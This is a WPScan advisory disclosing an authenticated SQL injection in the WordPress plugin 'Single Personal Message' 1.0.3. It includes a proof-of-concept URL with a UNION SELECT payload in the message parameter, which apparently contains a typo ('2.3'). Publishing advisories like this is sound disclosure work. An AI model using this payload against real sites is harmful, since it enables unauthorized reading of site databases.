Single Personal Message 1.0.3 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: any user.

$_GET[‘message’] is not escaped. Is accessible for every registered user.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=0%20UNION%20SELECT%201,2.3,name,5,slug,7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1

Affects

Plugin simple-personal-message

References

EXPLOITDB 40870
URL http://lenonleite.com.br/en/blog/2016/12/05/single-personal-message-1-0-3-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 102
Verified No
WPVDB ID 8700

Timeline

Publicly Published 2016-12-05 (4 months ago)
Added 2016-12-18 (3 months ago)
Last Updated 2016-12-18 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.